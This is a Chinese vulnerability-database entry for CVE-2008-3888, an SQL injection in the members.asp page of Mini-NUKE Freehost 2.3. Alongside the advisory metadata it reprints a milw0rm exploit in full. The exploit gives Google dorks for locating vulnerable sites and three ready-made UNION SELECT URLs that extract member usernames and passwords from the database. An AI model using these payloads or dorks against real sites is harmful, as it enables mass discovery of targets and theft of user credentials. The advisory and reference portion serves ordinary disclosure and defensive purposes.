Aspindir Mini_nuke_freehost SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114662 漏洞类型 SQL注入
发布时间 2008-02-25 更新时间 2008-09-02
CVE编号 CVE-2008-3888 CNNVD-ID CNNVD-200809-018
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5187
https://www.securityfocus.com/bid/80950
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-018
|漏洞详情
Mini-NUKEFreehost2.3版本中的members.asp存在SQL注入漏洞。远程攻击者可以借助member_details操作中的uid参数,执行任意的SQL指令。
|漏洞EXP
###############################################################
#
# MiniNuke v2.1 forum SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl:"members.asp?action"
#
# DORK 2 : allinurl: "members.asp"uid
#
################################################################
EXAMPLE=

members.asp?action=member_details&uid=SQL (exploit)

EXPLOIT 1 :

members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,sifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1,1,1,1,1%20from%20members

EXPLOIT 2 :

members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,sifre,0,sifre,0,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20from%20members

EXPLLOIT 3 :

members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20members


################################################################
# S@BUN               i AM NOT HACKER              S@BUN
################################################################

# milw0rm.com [2008-02-25]
|受影响的产品
Aspindir Mini Nuke Freehost 2.3
|参考资料

来源:BUGTRAQ
名称:20080825Mini-NUKEv2.3Freehost(tr)MultipleRemoteSQLInjectionVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/495743/100/0/threaded